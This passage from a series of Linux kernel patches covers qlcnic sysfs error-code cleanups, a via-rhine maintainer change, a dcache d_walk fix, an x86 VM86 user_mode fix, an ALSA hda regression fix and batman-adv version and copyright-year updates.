a/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c +++ b/drivers/net/ethernet/qlogic/qlcnic/qlcnic_sysfs.c @@ -24,8 +24,6 @@ #include #endif -#define QLC_STATUS_UNSUPPORTED_CMD -2 - int qlcnicvf_config_bridged_mode(struct qlcnic_adapter *adapter, u32 enable) { return -EOPNOTSUPP; @@ -166,7 +164,7 @@ static int qlcnic_82xx_store_beacon(struct qlcnic_adapter *adapter, u8 b_state, b_rate; if (len != sizeof(u16)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; memcpy(&beacon, buf, sizeof(u16)); err = qlcnic_validate_beacon(adapter, beacon, &b_state, &b_rate); @@ -383,17 +381,17 @@ static int validate_pm_config(struct qlcnic_adapter *adapter, dest_pci_func = pm_cfg[i].dest_npar; src_index = qlcnic_is_valid_nic_func(adapter, src_pci_func); if (src_index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; dest_index = qlcnic_is_valid_nic_func(adapter, dest_pci_func); if (dest_index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; s_esw_id = adapter->npars[src_index].phy_port; d_esw_id = adapter->npars[dest_index].phy_port; if (s_esw_id != d_esw_id) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } return 0; @@ -414,7 +412,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, count = size / sizeof(struct qlcnic_pm_func_cfg); rem = size % sizeof(struct qlcnic_pm_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); pm_cfg = (struct qlcnic_pm_func_cfg *)buf; @@ -427,7 +425,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, action = !!pm_cfg[i].action; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; id = adapter->npars[index].phy_port; ret = qlcnic_config_port_mirroring(adapter, id, @@ -440,7 +438,7 @@ static ssize_t qlcnic_sysfs_write_pm_config(struct file *filp, pci_func = pm_cfg[i].pci_func; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; id = adapter->npars[index].phy_port; adapter->npars[index].enable_pm = !!pm_cfg[i].action; adapter->npars[index].dest_npar = id; @@ -499,11 +497,11 @@ static int validate_esw_config(struct qlcnic_adapter *adapter, for (i = 0; i < count; i++) { pci_func = esw_cfg[i].pci_func; if (pci_func >= ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (adapter->ahw->op_mode == QLCNIC_MGMT_FUNC) if (qlcnic_is_valid_nic_func(adapter, pci_func) < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; switch (esw_cfg[i].op_mode) { case QLCNIC_PORT_DEFAULTS: @@ -517,25 +515,25 @@ static int validate_esw_config(struct qlcnic_adapter *adapter, if (ret != QLCNIC_NON_PRIV_FUNC) { if (esw_cfg[i].mac_anti_spoof != 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (esw_cfg[i].mac_override != 1) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (esw_cfg[i].promisc_mode != 1) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } break; case QLCNIC_ADD_VLAN: if (!IS_VALID_VLAN(esw_cfg[i].vlan_id)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (!esw_cfg[i].op_type) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; break; case QLCNIC_DEL_VLAN: if (!esw_cfg[i].op_type) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; break; default: - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } } @@ -559,7 +557,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, count = size / sizeof(struct qlcnic_esw_func_cfg); rem = size % sizeof(struct qlcnic_esw_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); esw_cfg = (struct qlcnic_esw_func_cfg *)buf; @@ -570,7 +568,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, for (i = 0; i < count; i++) { if (adapter->ahw->op_mode == QLCNIC_MGMT_FUNC) if (qlcnic_config_switch_port(adapter, &esw_cfg[i])) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (adapter->ahw->pci_func != esw_cfg[i].pci_func) continue; @@ -604,7 +602,7 @@ static ssize_t qlcnic_sysfs_write_esw_config(struct file *file, pci_func = esw_cfg[i].pci_func; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; npar = &adapter->npars[index]; switch (esw_cfg[i].op_mode) { case QLCNIC_PORT_DEFAULTS: @@ -654,7 +652,7 @@ static ssize_t qlcnic_sysfs_read_esw_config(struct file *file, esw_cfg[pci_func].pci_func = pci_func; if (qlcnic_get_eswitch_port_config(adapter, &esw_cfg[pci_func])) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); return size; @@ -669,11 +667,11 @@ static int validate_npar_config(struct qlcnic_adapter *adapter, for (i = 0; i < count; i++) { pci_func = np_cfg[i].pci_func; if (qlcnic_is_valid_nic_func(adapter, pci_func) < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (!IS_VALID_BW(np_cfg[i].min_bw) || !IS_VALID_BW(np_cfg[i].max_bw)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; } return 0; } @@ -694,7 +692,7 @@ static ssize_t qlcnic_sysfs_write_npar_config(struct file *file, count = size / sizeof(struct qlcnic_npar_func_cfg); rem = size % sizeof(struct qlcnic_npar_func_cfg); if (rem) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; qlcnic_swap32_buffer((u32 *)buf, size / sizeof(u32)); np_cfg = (struct qlcnic_npar_func_cfg *)buf; @@ -717,7 +715,7 @@ static ssize_t qlcnic_sysfs_write_npar_config(struct file *file, return ret; index = qlcnic_is_valid_nic_func(adapter, pci_func); if (index < 0) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; adapter->npars[index].min_bw = nic_info.min_tx_bw; adapter->npars[index].max_bw = nic_info.max_tx_bw; } @@ -784,13 +782,13 @@ static ssize_t qlcnic_sysfs_get_port_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (size != sizeof(struct qlcnic_esw_statistics)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (offset >= adapter->ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; memset(&port_stats, 0, size); ret = qlcnic_get_port_stats(adapter, offset, QLCNIC_QUERY_RX_COUNTER, @@ -819,13 +817,13 @@ static ssize_t qlcnic_sysfs_get_esw_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (size != sizeof(struct qlcnic_esw_statistics)) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; if (offset >= QLCNIC_NIU_MAX_XG_PORTS) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; memset(&esw_stats, 0, size); ret = qlcnic_get_eswitch_stats(adapter, offset, QLCNIC_QUERY_RX_COUNTER, @@ -853,10 +851,10 @@ static ssize_t qlcnic_sysfs_clear_esw_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (offset >= QLCNIC_NIU_MAX_XG_PORTS) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; ret = qlcnic_clear_esw_stats(adapter, QLCNIC_STATS_ESWITCH, offset, QLCNIC_QUERY_RX_COUNTER); @@ -883,10 +881,10 @@ static ssize_t qlcnic_sysfs_clear_port_stats(struct file *file, int ret; if (qlcnic_83xx_check(adapter)) - return QLC_STATUS_UNSUPPORTED_CMD; + return -EOPNOTSUPP; if (offset >= adapter->ahw->max_vnic_func) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; ret = qlcnic_clear_esw_stats(adapter, QLCNIC_STATS_PORT, offset, QLCNIC_QUERY_RX_COUNTER); @@ -953,9 +951,7 @@ static ssize_t qlcnic_83xx_sysfs_flash_read_handler(struct file *filp, struct qlcnic_adapter *adapter = dev_get_drvdata(dev); if (!size) - return QL_STATUS_INVALID_PARAM; - if (!buf) - return QL_STATUS_INVALID_PARAM; + return -EINVAL; count = size / sizeof(u32); @@ -1132,9 +1128,6 @@ static ssize_t qlcnic_83xx_sysfs_flash_write_handler(struct file *filp, struct device *dev = container_of(kobj, struct device, kobj); struct qlcnic_adapter *adapter = dev_get_drvdata(dev); - if (!buf) - return QL_STATUS_INVALID_PARAM; - ret = kstrtoul(buf, 16, &data); switch (data) { From 210347e1846d391aea863fb69165a2d70581f838 Mon Sep 17 00:00:00 2001 From: Roger Luethi Date: Tue, 26 May 2015 19:12:54 +0200 Subject: [PATCH 436/872] via-rhine: Resigning as maintainer I don't have enough time to look after via-rhine anymore. Signed-off-by: Roger Luethi Signed-off-by: David S. Miller --- MAINTAINERS | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 474bcb6c0bac..1bbacdaf5cf3 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -10588,8 +10588,7 @@ F: drivers/virtio/virtio_input.c F: include/uapi/linux/virtio_input.h VIA RHINE NETWORK DRIVER -M: Roger Luethi -S: Maintained +S: Orphan F: drivers/net/ethernet/via/via-rhine.c VIA SD/MMC CARD CONTROLLER DRIVER From 2159184ea01e4ae7d15f2017e296d4bc82d5aeb0 Mon Sep 17 00:00:00 2001 From: Al Viro Date: Thu, 28 May 2015 23:09:19 -0400 Subject: [PATCH 437/872] d_walk() might skip too much when we find that a child has died while we'd been trying to ascend, we should go into the first live sibling itself, rather than its sibling. Off-by-one in question had been introduced in "deal with deadlock in d_walk()" and the fix needs to be backported to all branches this one has been backported to. Cc: stable@vger.kernel.org # 3.2 and later Signed-off-by: Al Viro --- fs/dcache.c | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/fs/dcache.c b/fs/dcache.c index 656ce522a218..37b5afdaf698 100644 --- a/fs/dcache.c +++ b/fs/dcache.c @@ -1239,13 +1239,13 @@ static void d_walk(struct dentry *parent, void *data, /* might go back up the wrong parent if we have had a rename. */ if (need_seqretry(&rename_lock, seq)) goto rename_retry; - next = child->d_child.next; - while (unlikely(child->d_flags & DCACHE_DENTRY_KILLED)) { + /* go into the first sibling still alive */ + do { + next = child->d_child.next; if (next == &this_parent->d_subdirs) goto ascend; child = list_entry(next, struct dentry, d_child); - next = next->next; - } + } while (unlikely(child->d_flags & DCACHE_DENTRY_KILLED)); rcu_read_unlock(); goto resume; } From 7ba554b5ac69e5f3edac9ce3233beb5acd480878 Mon Sep 17 00:00:00 2001 From: Jan Beulich Date: Thu, 28 May 2015 09:16:45 +0100 Subject: [PATCH 438/872] x86/asm/entry/32: Really make user_mode() work correctly for VM86 mode While commit efa7045103 ("x86/asm/entry: Make user_mode() work correctly if regs came from VM86 mode") claims that "user_mode() is now identical to user_mode_vm()", this wasn't actually the case - no prior commit made it so. Signed-off-by: Jan Beulich Acked-by: Andy Lutomirski Cc: Andy Lutomirski Cc: Borislav Petkov Cc: Brian Gerst Cc: Denys Vlasenko Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Link: http://lkml.kernel.org/r/5566EB0D020000780007E655@mail.emea.novell.com Signed-off-by: Ingo Molnar --- arch/x86/include/asm/ptrace.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/include/asm/ptrace.h b/arch/x86/include/asm/ptrace.h index 19507ffa5d28..5fabf1362942 100644 --- a/arch/x86/include/asm/ptrace.h +++ b/arch/x86/include/asm/ptrace.h @@ -107,7 +107,7 @@ static inline unsigned long regs_return_value(struct pt_regs *regs) static inline int user_mode(struct pt_regs *regs) { #ifdef CONFIG_X86_32 - return (regs->cs & SEGMENT_RPL_MASK) == USER_RPL; + return ((regs->cs & SEGMENT_RPL_MASK) | (regs->flags & X86_VM_MASK)) >= USER_RPL; #else return !!(regs->cs & 3); #endif From b47eee2e0a7de623c24dbcaf303c3bf2b5155455 Mon Sep 17 00:00:00 2001 From: Takashi Iwai Date: Fri, 29 May 2015 09:43:29 +0200 Subject: [PATCH 439/872] ALSA: hda - Fix lost sound due to stream_pm ops cleanup The commit [49fb18972581: ALSA: hda - Set stream_pm ops automatically by generic parser] resulted in regressions on some Realtek and VIA codecs because these drivers set patch_ops after calling the generic parser, thus stream_pm got cleared to NULL again. I haven't noticed since I tested with IDT codec. Restore (partial revert) the stream_pm ops for them to fix the regression. Fixes: 49fb18972581 ('ALSA: hda - Set stream_pm ops automatically by generic parser') Reported-by: Jeremiah Mahler Signed-off-by: Takashi Iwai --- sound/pci/hda/patch_realtek.c | 1 + sound/pci/hda/patch_via.c | 1 + 2 files changed, 2 insertions(+) diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c index ea3af38eee58..464168426465 100644 --- a/sound/pci/hda/patch_realtek.c +++ b/sound/pci/hda/patch_realtek.c @@ -5729,6 +5729,7 @@ static int patch_alc269(struct hda_codec *codec) set_beep_amp(spec, spec->gen.mixer_nid, 0x04, HDA_INPUT); codec->patch_ops = alc_patch_ops; + codec->patch_ops.stream_pm = snd_hda_gen_stream_pm; #ifdef CONFIG_PM codec->patch_ops.suspend = alc269_suspend; codec->patch_ops.resume = alc269_resume; diff --git a/sound/pci/hda/patch_via.c b/sound/pci/hda/patch_via.c index 742087ef378f..31a95cca015d 100644 --- a/sound/pci/hda/patch_via.c +++ b/sound/pci/hda/patch_via.c @@ -472,6 +472,7 @@ static const struct hda_codec_ops via_patch_ops = { .init = via_init, .free = via_free, .unsol_event = snd_hda_jack_unsol_event, + .stream_pm = snd_hda_gen_stream_pm, #ifdef CONFIG_PM .suspend = via_suspend, .check_power_status = via_check_power_status, From 70e717762d2fa80e995303995c80e0abc6419997 Mon Sep 17 00:00:00 2001 From: Simon Wunderlich Date: Tue, 28 Apr 2015 20:29:53 +0200 Subject: [PATCH 440/872] batman-adv: Start new development cycle Signed-off-by: Simon Wunderlich --- net/batman-adv/main.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 4d2318829a34..9d5657e14765 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -24,7 +24,7 @@ #define BATADV_DRIVER_DEVICE "batman-adv" #ifndef BATADV_SOURCE_VERSION -#define BATADV_SOURCE_VERSION "2015.0" +#define BATADV_SOURCE_VERSION "2015.1" #endif /* B.A.T.M.A.N. parameters */ From 9f6446c7f9af084763037334d37e85dacfcbd403 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Thu, 23 Apr 2015 13:16:35 +0200 Subject: [PATCH 441/872] batman-adv: update copyright years for 2015 Signed-off-by: Sven Eckelmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- net/batman-adv/bat_algo.h | 2 +- net/batman-adv/bat_iv_ogm.c | 2 +- net/batman-adv/bitarray.c | 2 +- net/batman-adv/bitarray.h | 2 +- net/batman-adv/bridge_loop_avoidance.c | 2 +- net/batman-adv/bridge_loop_avoidance.h | 2 +- net/batman-adv/debugfs.c | 2 +- net/batman-adv/debugfs.h | 2 +- net/batman-adv/distributed-arp-table.c | 2 +- net/batman-adv/distributed-arp-table.h | 2 +- net/batman-adv/fragmentation.c | 2 +- net/batman-adv/fragmentation.h | 2 +- net/batman-adv/gateway_client.c | 2 +- net/batman-adv/gateway_client.h | 2 +- net/batman-adv/gateway_common.c | 2 +- net/batman-adv/gateway_common.h | 2 +- net/batman-adv/hard-interface.c | 2 +- net/batman-adv/hard-interface.h | 2 +- net/batman-adv/hash.c | 2 +- net/batman-adv/hash.h | 2 +- net/batman-adv/icmp_socket.c | 2 +- net/batman-adv/icmp_socket.h | 2 +- net/batman-adv/main.c | 2 +- net/batman-adv/main.h | 2 +- net/batman-adv/multicast.c | 2 +- net/batman-adv/multicast.h | 2 +- net/batman-adv/network-coding.c | 2 +- net/batman-adv/network-coding.h | 2 +- net/batman-adv/originator.c | 2 +- net/batman-adv/originator.h | 2 +- net/batman-adv/packet.h | 2 +- net/batman-adv/routing.c | 2 +- net/batman-adv/routing.h | 2 +- net/batman-adv/send.c | 2 +- net/batman-adv/send.h | 2 +- net/batman-adv/soft-interface.c | 2 +- net/batman-adv/soft-interface.h | 2 +- net/batman-adv/sysfs.c | 2 +- net/batman-adv/sysfs.h | 2 +- net/batman-adv/translation-table.c | 2 +- net/batman-adv/translation-table.h | 2 +- net/batman-adv/types.h | 2 +- 43 files changed, 43 insertions(+), 43 deletions(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index eb7d8c0388e4..79833ebcc2dd 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -1,5 +1,5 @@ # -# Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +# Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: # # Marek Lindner, Simon Wunderlich # diff --git a/net/batman-adv/bat_algo.h b/net/batman-adv/bat_algo.h index 4e49666f8c65..4e59cf3eb079 100644 --- a/net/batman-adv/bat_algo.h +++ b/net/batman-adv/bat_algo.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 00e00e09b000..fc299c03a438 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/bitarray.c b/net/batman-adv/bitarray.c index e3da07a64026..40e4a2a18e45 100644 --- a/net/batman-adv/bitarray.c +++ b/net/batman-adv/bitarray.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/bitarray.h b/net/batman-adv/bitarray.h index 2acaafe60188..be497be696d1 100644 --- a/net/batman-adv/bitarray.h +++ b/net/batman-adv/bitarray.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/bridge_loop_avoidance.c b/net/batman-adv/bridge_loop_avoidance.c index ac4b96eccade..fa941cd7d8ad 100644 --- a/net/batman-adv/bridge_loop_avoidance.c +++ b/net/batman-adv/bridge_loop_avoidance.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich * diff --git a/net/batman-adv/bridge_loop_avoidance.h b/net/batman-adv/bridge_loop_avoidance.h index 43c985d92c3e..1f506d34039e 100644 --- a/net/batman-adv/bridge_loop_avoidance.h +++ b/net/batman-adv/bridge_loop_avoidance.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich * diff --git a/net/batman-adv/debugfs.c b/net/batman-adv/debugfs.c index a4972874c056..0c213a892296 100644 --- a/net/batman-adv/debugfs.c +++ b/net/batman-adv/debugfs.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/debugfs.h b/net/batman-adv/debugfs.h index 37c4d6ddd04d..f3b49c394446 100644 --- a/net/batman-adv/debugfs.h +++ b/net/batman-adv/debugfs.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/distributed-arp-table.c b/net/batman-adv/distributed-arp-table.c index aad022dd15df..da1742d9059f 100644 --- a/net/batman-adv/distributed-arp-table.c +++ b/net/batman-adv/distributed-arp-table.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Antonio Quartulli * diff --git a/net/batman-adv/distributed-arp-table.h b/net/batman-adv/distributed-arp-table.h index 2fe0764c64be..ed41b8edba18 100644 --- a/net/batman-adv/distributed-arp-table.h +++ b/net/batman-adv/distributed-arp-table.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2011-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2011-2015 B.A.T.M.A.N. contributors: * * Antonio Quartulli * diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index 3d1dcaa3e8b5..af495cc861fe 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2013-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2013-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll * diff --git a/net/batman-adv/fragmentation.h b/net/batman-adv/fragmentation.h index d848cf6676a2..ec1e86f899e8 100644 --- a/net/batman-adv/fragmentation.h +++ b/net/batman-adv/fragmentation.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2013-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2013-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll * diff --git a/net/batman-adv/gateway_client.c b/net/batman-adv/gateway_client.c index 090828cf1fa7..a85eaca344e8 100644 --- a/net/batman-adv/gateway_client.c +++ b/net/batman-adv/gateway_client.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_client.h b/net/batman-adv/gateway_client.h index 7ee53bb7d50f..185fb0887654 100644 --- a/net/batman-adv/gateway_client.h +++ b/net/batman-adv/gateway_client.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_common.c b/net/batman-adv/gateway_common.c index 88a1bc3804d1..0792e2f101e4 100644 --- a/net/batman-adv/gateway_common.c +++ b/net/batman-adv/gateway_common.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/gateway_common.h b/net/batman-adv/gateway_common.h index aa5116561947..df5434229675 100644 --- a/net/batman-adv/gateway_common.h +++ b/net/batman-adv/gateway_common.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/hard-interface.c b/net/batman-adv/hard-interface.c index baf1f9843f2c..bdb020e29272 100644 --- a/net/batman-adv/hard-interface.c +++ b/net/batman-adv/hard-interface.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/hard-interface.h b/net/batman-adv/hard-interface.h index 1918cd50b62e..e8b6ffea703d 100644 --- a/net/batman-adv/hard-interface.h +++ b/net/batman-adv/hard-interface.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/hash.c b/net/batman-adv/hash.c index 7c1c63080e20..3a0e1dcd1f29 100644 --- a/net/batman-adv/hash.c +++ b/net/batman-adv/hash.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/hash.h b/net/batman-adv/hash.h index 539fc1266793..379e32acf2b4 100644 --- a/net/batman-adv/hash.h +++ b/net/batman-adv/hash.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2006-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2006-2015 B.A.T.M.A.N. contributors: * * Simon Wunderlich, Marek Lindner * diff --git a/net/batman-adv/icmp_socket.c b/net/batman-adv/icmp_socket.c index 161ef8f17d2e..6c3cfb57d132 100644 --- a/net/batman-adv/icmp_socket.c +++ b/net/batman-adv/icmp_socket.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/icmp_socket.h b/net/batman-adv/icmp_socket.h index 0c33950aa4aa..4815824e2f61 100644 --- a/net/batman-adv/icmp_socket.h +++ b/net/batman-adv/icmp_socket.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index 12fc77bef23f..ca63d487c490 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 9d5657e14765..11d2d9fbfc5e 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/multicast.c b/net/batman-adv/multicast.c index b24e4bb64fb5..09f2838dedf2 100644 --- a/net/batman-adv/multicast.c +++ b/net/batman-adv/multicast.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2014-2015 B.A.T.M.A.N. contributors: * * Linus Lüssing * diff --git a/net/batman-adv/multicast.h b/net/batman-adv/multicast.h index 3a44ebdb43cb..033d80e84fdf 100644 --- a/net/batman-adv/multicast.h +++ b/net/batman-adv/multicast.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2014-2015 B.A.T.M.A.N. contributors: * * Linus Lüssing * diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 127cc4d7380a..89e1d4772cff 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2012-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2012-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll, Jeppe Ledet-Pedersen * diff --git a/net/batman-adv/network-coding.h b/net/batman-adv/network-coding.h index 358c0d686ab0..b5ab8ff544ee 100644 --- a/net/batman-adv/network-coding.h +++ b/net/batman-adv/network-coding.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2012-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2012-2015 B.A.T.M.A.N. contributors: * * Martin Hundebøll, Jeppe Ledet-Pedersen * diff --git a/net/batman-adv/originator.c b/net/batman-adv/originator.c index 90e805aba379..e3900e452616 100644 --- a/net/batman-adv/originator.c +++ b/net/batman-adv/originator.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2009-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2009-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/originator.h b/net/batman-adv/originator.h index aa4a43696295..91339143a2f7 100644 --- a/net/batman-adv/originator.h +++ b/net/batman-adv/originator.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/packet.h b/net/batman-adv/packet.h index b81fbbf21a63..9468bc09c7c4 100644 --- a/net/batman-adv/packet.h +++ b/net/batman-adv/packet.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/routing.c b/net/batman-adv/routing.c index da83982bf974..c5d90095bc3c 100644 --- a/net/batman-adv/routing.c +++ b/net/batman-adv/routing.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 